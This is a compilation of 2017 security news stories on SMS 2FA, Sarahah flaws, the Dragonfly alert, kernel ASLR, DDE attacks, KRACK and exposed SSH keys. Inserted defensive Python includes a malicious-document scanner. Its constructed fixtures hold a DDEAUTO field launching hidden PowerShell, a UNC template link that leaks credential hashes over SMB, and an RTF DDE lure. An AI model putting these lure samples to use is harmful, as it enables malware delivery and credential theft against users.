Google slides text message 2FA a little closer to the door


Text messages aren’t a great way to implement two-factor authentication, but the technique is stubbornly persistent. Now Google is nudging things along by making its alternative the default for anyone who sets up two-step verification from here on.

The Chocolate Factory’s alternative is called “Google Prompt”. Instead of sending users a one-time code in a text message, it asks users if they are trying to sign in. If they are, in they go. If they’re not expecting the login prompt, down come the shutters.

Prompt first landed back in July as an option, replacing the one-time SMS code with a push notification handled by an app. As the company explained at the time, SMS-based 2FA is susceptible to phishing (a code the victim can be tricked into typing into a fake page is a code the attacker can replay), so a simple yes/no prompt tied to the device improves security.

Infosec bods have long warned that 2FA-by-text is insecure. Last year, NIST said it should be deprecated, and the problems were made manifest in May when attackers exploited Signalling System 7 (SS7) vulnerabilities to intercept SMS codes and take over 2FA-protected accounts.

Last month, Positive Technologies named Gmail as one service still vulnerable to compromise via SS7.

Mountain View is following one of NIST’s preferred paths: an app for 2FA.

For now, text-based 2FA remains available as a fallback, alongside the Authenticator app, backup codes and Google’s Security Keys.

As the blog post noted, “This will only impact users who have not yet set up 2SV. Current 2SV users’ settings will be unaffected. In addition, if a user attempts to set up 2SV but doesn’t have a compatible mobile device, he or she will be prompted to use SMS as their authentication method instead.”

One reason for retaining text 2FA is that the Prompts app needs a data connection to work.

Prompt supports both Android and iOS phones (iPhone users need the Google app installed to receive prompts).

The Joy and Pain of Buying IT – Have Your Say

Article source:

Sarahah anonymous feedback app told: ‘You’re riddled with web app flaws’


The web-based version of anonymous feedback app Sarahah is riddled with security flaws, according to a researcher.

Sarahah is a wildly popular mobile app that lets people receive anonymous feedback messages from friends and co-workers. Flaws in its web front end make it vulnerable to web-based attacks including cross-site scripting (XSS) and cross-site request forgery (CSRF), according to security researcher Scott Helme.

Helme found that it was “trivially easy” to bypass the app’s Cross-Site Request Forgery (CSRF) protection. CSRF is a class of attack in which a malicious page makes a logged-in user’s browser send a request, cookies and all, that performs an unwanted action on the target web application.

[…], another technology popular with teenagers, became a platform for insults and flaming, partly because the ability to send anonymous messages brought out the worst in people.

The Sarahah app does seem to have some rudimentary filtering in place to prevent abuse of other members but it doesn’t include rate limiting. This omission meant Helme was able to anonymously send hundreds of messages to a test account.
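The two controls Helme found wanting are cheap to get right. As an added example, not code from Sarahah or from Helme’s write-up, here is a synchronizer-token CSRF check and a sliding-window rate limiter in front of a hypothetical message-submission handler; the handler, its session identifiers and the limit of five messages per sender/recipient pair per hour are assumptions made for the demonstration:

```python
import hmac
import secrets
import time
from collections import defaultdict, deque


class CsrfGuard:
    """Synchronizer-token CSRF protection.

    One unpredictable token per login session is stored server-side and echoed
    back in a hidden form field; a request whose token is missing or does not
    match the session's token is rejected.
    """

    def __init__(self):
        self._tokens = {}  # session id -> token

    def issue(self, session_id):
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def check(self, session_id, submitted):
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        # constant-time compare so the token can't be guessed byte by byte
        return hmac.compare_digest(expected.encode(), submitted.encode())


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock  # injectable so the window can be tested deterministically
        self._hits = defaultdict(deque)

    def allow(self, key):
        now = self.clock()
        hits = self._hits[key]
        while hits and now - hits[0] >= self.window:
            hits.popleft()  # drop timestamps that fell out of the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


def handle_send_message(guard, limiter, session_id, form, client_ip, recipient):
    """Hypothetical handler for POST /messages (assumed route). Returns an HTTP status code."""
    if not guard.check(session_id, form.get("csrf_token")):
        return 403  # forged or missing token: likely a cross-site request
    # Key the limit on (sender address, recipient) so one client can't flood one
    # victim; a second, per-recipient limit would also blunt distributed floods.
    if not limiter.allow((client_ip, recipient)):
        return 429
    return 200
```

The limiter state lives in process memory here; behind more than one web node it would go in a shared store such as Redis, keyed the same way.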

Helme told El Reg that Sarahah exhibited numerous flaws he was surprised to find in an app with so large a user base.

“My biggest worry is that this is a brand new application and the issues were not difficult to find at all,” Helme explained. “They are basic issues I wouldn’t expect to find in a new app and as a result I’m concerned the app hasn’t undergone any security testing prior to release. If it has then I’d be raising some very serious questions with the firm that did the testing as to why such fundamental flaws were missed.”

In response to queries from El Reg, Sarahah acknowledged Helme’s research had uncovered flaws in its technology. “We have passed the items to our developer and doing our best to solve the issues,” it said.

Sarahah is the number one app on Apple’s App Store and is number one in more than 10 countries on Google Play too.

Helme first reported the issues to the firm weeks ago, in early August, and expressed frustration about the slow response.

“An app of this nature should be very security and privacy focused,” he explained. “I was disappointed at how difficult it was to contact the firm to responsibly disclose these issues that affect their users and how poor the response and handling was once I made contact.”

US energy, nuke and aviation sectors under sustained attack


The United States’ Department of Homeland Security has issued an alert that warns of “advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.”

The alert says an unknown actor has been at it since May 2017 and has compromised some networks.

Compiled with the help of the FBI, the alert also acknowledges Symantec’s September 2017 report on attacks labelled ‘Dragonfly’, and says “The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets.”

The attackers “are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations.” The alert adds “the threat actors focused on identifying and browsing file servers within the intended victim’s network [and] viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were originally named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).”

The attacks were conducted with depressingly familiar tactics: the perps would first identify high-value targets in the organisations they sought to crack, then spear-phish them with emails bearing subject lines such as “AGREEMENT Confidential” and carrying benign-looking attachments that “prompted the user to click on a link should a download not automatically begin.” In a colossal non-surprise, some of those links led to malware.

Other phishing campaigns led to fake login pages that harvested credentials.

Once the attackers had credentials, they loaded malware that hunted for and exfiltrated data, and in some cases created new user accounts on the targeted domains to keep their access.

The alert notes that the phishing payloads were legitimate attachments that did not themselves contain malware, but exploited either user gullibility or known-to-be-risky features, such as a document that fetches a remote template over Server Message Block (SMB). That fetch makes the victim’s Windows machine authenticate to the attacker’s server and hand over a credential hash that can be cracked offline.

The attackers’ tactics worked just as well on virtual desktops as on standalone computers, a worrying outcome given government agencies’ frequent use of virtual PCs as a way to improve security.

The Department’s recommended actions therefore reference existing and long-standing security advice and include things like deploying email and web filters, checking for obvious signs of intrusion like frequent deletion of log files and checking to see if new users have unexpectedly been created.
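Two of those checks, unexpected account creation and repeated clearing of the security log, are easy to automate once Windows Security events are being forwarded. The following is an added example, not something from the DHS alert, that triages a constructed sample of events (4720 account created, 4728/4732 member added to a group, 1102 audit log cleared); the approved provisioners, privileged groups and change window are assumptions a deployment would replace with its own:

```python
import json
from collections import Counter
from datetime import datetime

# Constructed sample of Windows Security-log events as a SIEM might forward
# them (one JSON object per line). Hosts, users and times are made up.
SAMPLE_EVENTS = """\
{"ts": "2017-10-20T02:14:09Z", "host": "HMI-01", "event_id": 4720, "subject": "svc_backup", "target": "supp0rt", "group": null}
{"ts": "2017-10-20T02:14:31Z", "host": "HMI-01", "event_id": 4732, "subject": "svc_backup", "target": "supp0rt", "group": "Administrators"}
{"ts": "2017-10-20T02:20:00Z", "host": "HMI-01", "event_id": 1102, "subject": "supp0rt", "target": null, "group": null}
{"ts": "2017-10-20T09:05:12Z", "host": "FS-02", "event_id": 4720, "subject": "helpdesk.jane", "target": "new.starter", "group": null}
{"ts": "2017-10-20T09:06:00Z", "host": "FS-02", "event_id": 4624, "subject": "-", "target": "new.starter", "group": null}
{"ts": "2017-10-21T02:01:00Z", "host": "HMI-01", "event_id": 1102, "subject": "supp0rt", "target": null, "group": null}
"""

# Assumptions about the environment: who may provision accounts, which groups
# matter, and when the change window is.
APPROVED_PROVISIONERS = {"helpdesk.jane"}
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Remote Desktop Users"}
BUSINESS_HOURS = range(7, 19)  # 07:00-18:59 UTC

ACCOUNT_CREATED = 4720
ADDED_TO_GLOBAL_GROUP = 4728
ADDED_TO_LOCAL_GROUP = 4732
AUDIT_LOG_CLEARED = 1102


def parse_events(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def triage(events, approved=APPROVED_PROVISIONERS):
    """Return a list of findings; each is a dict with host, severity and reason."""
    findings = []
    clears = Counter()
    for ev in events:
        eid, host, subj = ev["event_id"], ev["host"], ev["subject"]
        if eid == ACCOUNT_CREATED:
            if subj not in approved:
                findings.append(dict(host=host, severity="high",
                                     reason=f"account {ev['target']} created by unapproved identity {subj}"))
            elif ev["ts"].hour not in BUSINESS_HOURS:
                findings.append(dict(host=host, severity="medium",
                                     reason=f"account {ev['target']} created outside change window"))
        elif eid in (ADDED_TO_GLOBAL_GROUP, ADDED_TO_LOCAL_GROUP) and ev["group"] in PRIVILEGED_GROUPS:
            findings.append(dict(host=host, severity="high",
                                 reason=f"{ev['target']} added to {ev['group']} by {subj}"))
        elif eid == AUDIT_LOG_CLEARED:
            clears[host] += 1
            findings.append(dict(host=host, severity="high",
                                 reason=f"security log cleared by {subj}"))
    # Repeated clearing on one host is the "frequent deletion of log files" sign
    for host, n in clears.items():
        if n >= 2:
            findings.append(dict(host=host, severity="critical",
                                 reason=f"security log cleared {n} times"))
    return findings
```

On the sample, the out-of-hours account created by a service account, its promotion to Administrators and the two log clears on the same host are flagged; the helpdesk-created account during business hours is not.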

The alert doesn’t say what damage, if any, the attacks have wrought. Nor does it attribute the attacks, although the Department has previously suggested [PDF] that Dragonfly was a Kremlin-sponsored operation.

NetBSD, OpenBSD improve kernel security, randomly


The folks at NetBSD have released their first cut of code to implement kernel ASLR (Address Space Layout Randomisation) for the amd64 port, i.e. 64-bit x86 processors from AMD and Intel alike.

The KASLR release randomises where the NetBSD kernel loads in memory, giving the kernel the same security protections that ASLR gives applications.

Randomising where code and data sit in memory makes bug classes like buffer overruns harder to exploit: an attacker who does not know the kernel’s addresses cannot reliably redirect execution into useful code, or aim a corrupted pointer at the structure they want to overwrite.

As developer Maxime Villard explains, the current implementation puts a specialised kernel, “prekern”, between the bootloader and the kernel.

“The kernel is compiled as a raw library with the GENERIC_KASLR configuration file, while the prekern is compiled as a static binary. When the machine boots, the bootloader jumps into the prekern. The prekern relocates the kernel at a random virtual address (VA), and jumps into it. Finally, the kernel performs some cleanup, and executes normally.”

Villard adds that the implementation is incomplete: for example, wherever prekern puts the kernel, the whole thing still lands in one contiguous block, so a single leaked kernel address reveals the location of everything else.

That makes the direction of future development pretty obvious, with the main items being:

  • Randomise the kernel sections independently, and intertwine them;
  • Modify several kernel entry points not to leak kernel addresses to userland;
  • Randomise the kernel heap too (which is still static for now).

The OpenBSD project offered its first look at a similar approach back in June, referred to as KARL (Kernel Address Randomized Link): the kernel’s object files are re-linked in a random order at each boot, so no two boots share a layout.

That effort became mainstream early this month in OpenBSD 6.2.

New phishing campaign uses 20-year-old Microsoft mess as bait


The ever-vigilant folk at the SANS Internet Storm Center have spotted yet another campaign trying to drop the Locky ransomware using booby-trapped Word files.

As Internet Storm Center handler Brad Duncan writes, the Word documents abuse Microsoft Dynamic Data Exchange (DDE), a legacy feature that lets one Office application pull data from another application, which attackers repurpose to launch an arbitrary command. This is the kind of attack that was spotted last week in a phishing campaign aimed at Freddie Mac.

Duncan outlines the attack chain in a flowchart (image: Brad Duncan, SANS).

The phishing messages carrying this attack come from the Necurs botnet, he writes, and as with other DDE attacks the aim is to convince users to OK through the security warnings. A fake invoice is the scammers’ preferred weapon.

If the attack cons the victim, the poisoned document fetches a downloader, which in turn pulls a copy of Locky to encrypt the target’s files.

Once the ransomware has launched and encrypted the victim’s files, Locky deletes itself (the downloader is left behind) and a demand for 0.25 Bitcoin is issued.

Duncan writes: “This is an interesting development, because it shows how the DDE attack technique has spread to large-scale distribution campaigns. It’s not new, and I’m not sure how effective it really is. If you know of anyone who was infected from one of these DDE-based Office documents, please tell your story in the comments.”

The Register noted last week that DDE has been around since 1987, and it’s increasingly popular with attackers.

Since users have to okay execution, Microsoft steadfastly insists DDE is a feature, not a bug.

Office DDE attack works in Outlook too – here’s what to do


In the last two weeks, Sophos researchers have kept an eye on an attack technique that abuses Microsoft’s Dynamic Data Exchange (DDE) protocol, a feature used to send messages and share data between applications.

Yesterday, new developments revealed an additional dimension to this attack.

Early on, we noted that attackers could exploit DDE to launch malware via tainted Office attachments, for example in Word and Excel files, but without using macros. 

On Friday, independent reports surfaced showing that it’s possible to run DDE attacks in Outlook using emails and calendar invites formatted in Rich Text Format (RTF), not just by sending Office files attached to emails.

In the original attack users had to be coaxed into opening malicious attachments. By putting the code into the email message body itself, the attack comes one step closer, meaning that the social engineering needed to talk a recipient into falling for it becomes easier.

The good news is that whether a DDE attack comes via an attachment or directly in an email or a calendar invite, you can stop the attack easily:

Just say no

Attachments, emails and calendar invites pop up two giveaway warning dialogs before triggering a DDEAUTO attack; if you say “No” at either dialog, you prevent the attack. (SophosLabs is not yet aware of any mechanism to bypass these dialog boxes.)

First, you’ll see a warning like this when DDE is used:

This document contains links that may refer to other files. Do you want to update this document with the data from the linked files?

Clicking “No” will stop a DDE attack from running.

If you click “Yes” at the first dialog, you will see a second dialog warning that a command is about to be run (the text in parenthesis and the program names referenced at the end will vary):

The remote data (k powershell -w hidden -NoP -NoExit -) is not accessible. Do you want to start the application C:\windows\system32\cmd.exe?

Again, clicking “No” will stop the attack.

You can also neuter DDE attacks embedded directly in emails by viewing all your messages in plain text format, regardless of the format they were sent in.

Note, however, that this will disable all formatting, colours and images in all messages, including those sent in the popular HTML email format. This will make some messages harder to read and may prevent you seeing content that the sender is expecting you to see.

Please check the Microsoft Support website for details of how to view all emails in plain text format in Outlook.
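The DDE lures in the Locky campaign, the RTF variant described above and the SMB-fetching documents in the DHS alert can all be caught before a user ever sees a dialog, because each leaves a tell-tale marker in the document container. This added example (not code from SANS, Sophos or DHS) scans a .docx/.xlsx zip for DDE field codes, including ones split across runs, for external relationships whose target is a UNC or file: path, and for DDE-style formulas in spreadsheets, and scans RTF bodies for DDE fields with the keyword hex-escaped. The sample documents it builds are constructed for the demonstration and are not real malware:

```python
import io
import re
import zipfile

# Word stores field codes either as <w:fldSimple w:instr="..."> or as runs of
# <w:instrText>, which attackers split ("DDE" + "AUTO") to dodge naive greps.
INSTR_TEXT_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.DOTALL)
FLD_SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
RELATIONSHIP_RE = re.compile(r"<Relationship\b([^>]*?)/?>")
TARGET_RE = re.compile(r'Target="([^"]*)"')
EXCEL_FORMULA_RE = re.compile(r"<f[^>]*>([^<]*)</f>")
RTF_HEX_RE = re.compile(r"\\'([0-9a-fA-F]{2})")
RTF_FLDINST_RE = re.compile(r"\\fldinst\s*\{?([^}]*)")


def scan_ooxml(data):
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            content = z.read(name).decode("utf-8", "replace")
            if name.endswith(".rels"):
                # A template/hyperlink relationship pointing at a UNC path makes
                # Office fetch over SMB and authenticate to the remote host.
                for attrs in RELATIONSHIP_RE.findall(content):
                    if 'targetmode="external"' not in attrs.lower():
                        continue
                    m = TARGET_RE.search(attrs)
                    target = m.group(1) if m else ""
                    if target.startswith("\\\\") or target.lower().startswith("file:"):
                        findings.append(f"{name}: external SMB/file link -> {target}")
            elif name.startswith("word/") and name.endswith(".xml"):
                fields = "".join(INSTR_TEXT_RE.findall(content))  # rejoin split runs
                fields += " " + " ".join(FLD_SIMPLE_RE.findall(content))
                if DDE_RE.search(fields):
                    findings.append(f"{name}: DDE field -> {fields.strip()[:80]}")
            elif name.startswith("xl/worksheets/") and name.endswith(".xml"):
                for formula in EXCEL_FORMULA_RE.findall(content):
                    if "|" in formula and "!" in formula:  # app|topic!item shape
                        findings.append(f"{name}: DDE formula -> {formula[:80]}")
    return findings


def scan_rtf(data):
    text = data.decode("latin-1")
    # resolve \'hh escapes first: the keyword is often hidden as \'44\'44E...
    text = RTF_HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return [f"rtf field -> {inst.strip()[:80]}"
            for inst in RTF_FLDINST_RE.findall(text) if DDE_RE.search(inst)]


def scan(data):
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.lstrip().startswith(b"{\\rtf"):
        return scan_rtf(data)
    return []


def build_docx(document_xml, settings_rels=None):
    """Constructed minimal .docx for the demonstration (not a full Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        if settings_rels:
            z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


# Constructed samples: a lure carrying both tricks, a clean document, and an
# RTF body with the keyword hex-escaped. 203.0.113.5 is a documentation address.
EVIL_DOC = (
    '<w:document><w:body><w:p>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\\\windows\\\\system32\\\\cmd.exe '
    '"/k powershell -w hidden -NoP"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '</w:p></w:body></w:document>'
)
EVIL_RELS = (
    '<Relationships><Relationship Id="rId1" TargetMode="External" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="\\\\203.0.113.5\\share\\invoice.dotm"/></Relationships>'
)
CLEAN_DOC = '<w:document><w:body><w:p><w:r><w:t>Q3 report</w:t></w:r></w:p></w:body></w:document>'
EVIL_RTF = (b"{\\rtf1\\ansi{\\field{\\*\\fldinst {\\'44\\'44EAUTO c:\\\\windows\\\\system32\\\\cmd.exe "
            b"\"/k calc\"}}{\\fldrslt click}}}")
```

`scan()` takes raw bytes, so it can sit in a mail gateway or a file-upload handler; anything it flags deserves quarantine rather than a warning dialog the user may click through.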

A plethora of patches, Kaspersky hits back, new hope for Wannacry Brit hero – and more


Roundup IT admins aren’t always fond of patching. It’s like going to the dentist – it needs to be done but it can be a pain to do. Sadly, this week there was a lot of patching to be done.

The Wi-Fi WPA2 weakness dubbed KRACK burdened Android, Linux and macOS users at work and home with patch installation responsibilities, and Cisco added to the load with a bumper crop of fixes for various security bugs, ranging from denial-of-service to authorization bypasses: two patches for its IP phones, one for FXOS and NX-OS users, and a critical fix for its Cloud Services Platform.

There is at least some good news on the patching front. Samsung users will have had their latest Android patches delivered automatically, and Huawei has said it is getting tighter about sending out updates to its handsets. And Debian fixed a slightly embarrassing oversight in its ftpsync tool, which is used to mirror the Linux distro.

If you have a Lenovo Android tablet, VIBE, Moto or ZUK phone, please grab and install this patch to avoid being hacked over the air: the mechanism Lenovo uses to push updates to devices can be hijacked by malicious code to install malware.

And if you use an Axalto or Gemalto .NET v2 smartcard, be aware that the Infineon RSA key-generation flaw (ROCA), best known for its effect on TPMs, may well affect the security of your devices.

Meanwhile, there were some rather breathless headlines this week about a secret silo of un-patched security vulnerabilities in Microsoft products that Redmond was keeping all to itself, which hackers obtained in 2013. This led to much wailing about how could nasty old Microsoft be allowed to get away with this.

Yet, virtually every software company has the same sort of silo: it’s called a bug database, and contains all the things engineers are planning to fix and is usually kept confidential. Yes, it appears Microsoft did get hacked, meaning details of exploitable bugs potentially fell into the wrong hands, and the IT giant said as much at the time. Its Apple Mac computers, how ironic, were among its corporate machines compromised by the intruders, who then scoured other parts of Redmond’s internal networks for valuable information. However, the biz claims it all led to nothing.

“In February 2013, we commented on the discovery of malware, similar to that found by other companies at the time, on a small number of computers including some in our Mac business unit,” a Microsoft spokesperson told The Register. “Our investigation found no evidence of information being stolen and used in subsequent attacks.”

Eugene throws shade but IT bosses are the worst snoops

It’s clear that Eugene Kaspersky isn’t going to back down over claims that his antivirus giant was helping Russian intelligence spy on millions of computers around the world. In a lengthy blog post he offered an update on the situation.

“The past year has seen concerns about KL change from ‘what if their technology could be a tool for cyber-espionage by nation states’ to ‘they were hacked and used as a vehicle to spy on spies’,” he wrote. “And while it’s hard for us to keep up with the constantly evolving narrative, ask yourself one thing: ‘if these recent allegations are true, where’s the evidence?’”

One thing he didn’t mention, but we were wondering about, is that if the NSA staffer who was apparently taking work home is such a specialist, it’s rather interesting that the AV system this person chose for their home PC was Kaspersky. That’s quite an endorsement when you think about it.

While we’re on the topic of spying, a survey out this week from governance group One Identity found that the biggest snoops on IT networks are the IT bosses themselves. Some 56 per cent of IT security staffers admitted to looking at other people’s data on the network, but that rose to 71 per cent among IT management.

As for actual data theft, there appears to be trouble brewing for South Africa. Troy Hunt, who runs the Have I Been Pwned website, claims to have found an archive online containing the personal data of every pensioner in South Africa.

Hunt said that the archive is a 27.2GB backup file in which he found names, gender, ethnicity, home ownership records, people’s identity numbers and contact information. The data also contained other information, such as estimated income and details of employers.

After opening it up, Hunt found 31.6 million records before the archive crashed on him. He estimated there could be 47 million records in all, and this archive is just sitting out on torrent sites for anyone to grab.

Hutchins moves closer to freedom

So as not to end on a downer there’s some great news for Marcus Hutchins, the Brit malware researcher who stopped the Wannacry ransomware outbreak by discovering and activating its kill switch, and then got pinched by the Feds in the US and accused of being a black hat hacker himself.

After a short sojourn in jail, Hutchins was bailed, and is now living in Los Angeles, California, while he awaits trial and fends off claims he helped develop malware that targeted online bank accounts back in the day. He’s under a strict curfew, can’t really do his day job of security research due to restrictions placed on him, and has to wear a GPS ankle bracelet at all times.

The downside of the latter condition is that the GPS unit isn’t waterproof. Hutchins is a keen surfer and is living near some of the most iconic surfing spots in the world, but can’t get in for fear of the GPS tracker dying in the sea and him being arrested.

But now a judge has ruled [PDF] that he can take it off and doesn’t have to be at home promptly at 9pm each night – thus allowing him a measure of normality and the chance to catch some breaks. Sadly though it’s not that simple. The US government has appealed the decision so he’s stuck on shore for the moment, but it’s a hopeful step.

The Week in Crypto: Bad News for SSH, WPA2, RSA & Privacy

Between KRACK, ROCA, new threats to SSH keys, and the European Commission’s loosey-goosey stance on encryption backdoors, it’s been a difficult time for cryptography.

BY DAWN KAWAMOTO AND SARA PETERS — This week started off with a bang when the KRACK key reinstallation attack vulnerabilities upended the security of Wi-Fi and the ROCA factorization bug made trusted platform module chips built on Infineon’s RSA library suddenly less trustworthy. That isn’t all the week had in store for the cryptography world, though.

Here’s a rundown on the latest news on KRACK, ROCA, and the news you might have missed about SSH and encryption backdoor regulation.

SSH Keys Being Scanned by Attackers and Ignored by Security
SSH (Secure Shell) got a little jolt this week, as well. Wordfence, a security service for WordPress, discovered a threat actor scanning up to 25,000 systems a day looking specifically for exposed private SSH keys. The attacker is requesting paths containing terms like “ssh,” “root,” and “id_rsa,” hoping to hit a directory of private keys that was stored under a web root by mistake.

The rate of scanning for SSH keys from known-malicious IPs has continued at the same rate since Monday; roughly 25,000 systems per day, “which jumped up from just about zero,” according to Mark Maunder, CEO and founder of Wordfence.

In response, Wordfence is helping users determine whether they have publicly exposed private SSH keys by adding the check to its Gravity Scan service. Maunder says that users must prove site ownership before Gravity Scan will provide vulnerability details.

SSH is a ubiquitous but often overlooked cryptographic network protocol created largely as a secure alternative to telnet and rsh/rexec. It’s used for secure remote logins and secure file transfer; it’s used not only for WordPress but across admin-to-machine and machine-to-machine communications in all manner of Linux- and Unix-based systems.

So far, Wordfence has not seen any active exploits as a result of this SSH key hunt. Maunder says that problems like this are often a result of users accidentally placing private keys in the wrong place because they don’t know it’s a risk. “It’s really an education problem,” says Maunder. 

In a survey released Tuesday, conducted by Dimensional Research on behalf of Venafi, 90% of respondents conceded that they do not have a complete and accurate inventory of all their SSH keys, “so there is no way to determine if keys have been stolen, misused or should be trusted,” according to researchers.

The author of SSH, Tatu Ylonen, has himself lamented organizations’ woeful management of SSH keys and has suggested improvements to his protocol to eliminate problems like the proliferation of rogue keys. For now, though, respondents to Venafi’s study continue to commit the key management sins that SSH experts warn against. Forty percent of respondents do not rotate SSH keys at all, or only occasionally; 61% do not limit or monitor the number of administrators who manage SSH; 54% do not limit the locations from which SSH keys can be used (thereby making remote attacks easier); and 51% do not enforce “no port forwarding” rules (thereby effectively allowing users to bypass firewalls).
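Finding the keys that a scanner like the one Wordfence observed would find, and noting which of them are unencrypted or loosely permissioned, is a short job from the defender’s side of the filesystem. This is an added example, not Wordfence’s Gravity Scan nor anything from Venafi’s survey; the web-root directory names and the constructed sample tree are assumptions, and the openssh-key-v1 header it builds carries only the fields the cipher check reads, so it is not a usable key:

```python
import base64
import os
import re
import stat
import tempfile

PEM_HEADER_RE = re.compile(rb"-----BEGIN ([A-Z ]+?) PRIVATE KEY-----")
OPENSSH_BODY_RE = re.compile(rb"-----BEGIN OPENSSH PRIVATE KEY-----\s*(.*?)\s*-----END", re.DOTALL)
# Directory names that usually mean "served over HTTP" (assumption; adjust per host)
WEB_ROOT_MARKERS = ("public_html", "htdocs", "www", "wwwroot")


def openssh_cipher(data):
    """Return the cipher name recorded in an 'openssh-key-v1' key ('none' = plaintext)."""
    m = OPENSSH_BODY_RE.search(data)
    if not m:
        return None
    blob = base64.b64decode(b"".join(m.group(1).split()))
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        return None
    pos = len(magic)
    n = int.from_bytes(blob[pos:pos + 4], "big")  # string fields are length-prefixed
    return blob[pos + 4:pos + 4 + n].decode("ascii", "replace")


def classify_key(path, data):
    m = PEM_HEADER_RE.search(data)
    if not m:
        return None
    kind = m.group(1).decode()
    if kind == "OPENSSH":
        encrypted = openssh_cipher(data) not in (None, "none")
    else:
        # legacy PEM keys flag encryption in a header line; PKCS#8 uses an ENCRYPTED wrapper
        encrypted = kind == "ENCRYPTED" or b"Proc-Type: 4,ENCRYPTED" in data
    mode = stat.S_IMODE(os.stat(path).st_mode)
    parts = path.split(os.sep)
    return {
        "path": path,
        "kind": kind,
        "encrypted": encrypted,
        "world_or_group_readable": bool(mode & 0o077),
        "under_web_root": any(p in WEB_ROOT_MARKERS for p in parts),
    }


def find_private_keys(root, max_bytes=16384):
    """Walk `root` and report every file that looks like an SSH private key."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(max_bytes)
            except OSError:
                continue
            info = classify_key(path, head)
            if info:
                findings.append(info)
    return findings


def _openssh_blob(cipher):
    """Constructed minimal openssh-key-v1 header: magic, cipher, kdf name, kdf options."""
    body = b"openssh-key-v1\x00"
    for field in (cipher, b"none" if cipher == b"none" else b"bcrypt", b""):
        body += len(field).to_bytes(4, "big") + field
    b64 = base64.b64encode(body).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n".encode()


def make_demo_tree():
    """Constructed sample tree: a plaintext key published under a web root, an
    encrypted key with tight permissions, and an ordinary text file."""
    root = tempfile.mkdtemp(prefix="sshkeys-")
    os.makedirs(os.path.join(root, "public_html", ".ssh"))
    os.makedirs(os.path.join(root, "home", ".ssh"))
    exposed = os.path.join(root, "public_html", ".ssh", "id_rsa")
    with open(exposed, "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...constructed...\n-----END RSA PRIVATE KEY-----\n")
    os.chmod(exposed, 0o644)
    safe = os.path.join(root, "home", ".ssh", "id_ed25519")
    with open(safe, "wb") as fh:
        fh.write(_openssh_blob(b"aes256-ctr"))
    os.chmod(safe, 0o600)
    with open(os.path.join(root, "home", "notes.txt"), "wb") as fh:
        fh.write(b"nothing to see here\n")
    return root
```

Run `find_private_keys("/")` from cron and you have the inventory the Venafi respondents lack; a key that is both under a web root and unencrypted is the case the scanner above is hunting for.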

The Impact of KRACK
Key Reinstallation Attacks (KRACKs), which affect all modern Wi-Fi devices and access points, are hitting Cisco particularly hard. The networking giant released Thursday an updated security advisory on KRACK, noting that 71 of its products had at least one of the 10 CVEs tied to KRACK.

For Cisco’s customers using these products, there are currently no fixes available and only a workaround for one of the 10 vulnerabilities, the company notes.

“Cisco will release software updates that address these vulnerabilities. There is a workaround that addresses the vulnerability in CVE-2017-13082. There are no workarounds that address the other vulnerabilities described in this advisory,” the company stated.

In addition to the 71 products that are vulnerable to KRACK, Cisco has another 22 products it is actively investigating to determine if they are also at risk, the company notes.

Earlier this week, researchers at KU Leuven in Belgium disclosed the KRACK vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol that is used to secure Wi-Fi networks. The flaws can be exploited to decrypt traffic, inject or hijack connections, and carry out other nefarious activities against data as it moves across a Wi-Fi network.

The WPA2 encryption protocol flaws also have industry titans Microsoft, Apple, and Google hustling to develop patches for their devices, as TechCrunch reports.

Microsoft has a patch out for its Windows 7, Windows 8, Windows 8.1, and Windows 10 devices, but Apple is working to roll out a fix to customers and currently has a beta version of macOS, iOS, tvOS, and watchOS available for download, notes TechCrunch.

And while exact figures on the number of users who are affected by these KRACK vulnerabilities are not available, it would not be hard to envision millions of users could potentially be affected given the omnipresence of WPA2 encryption protocols in Wi-Fi devices.

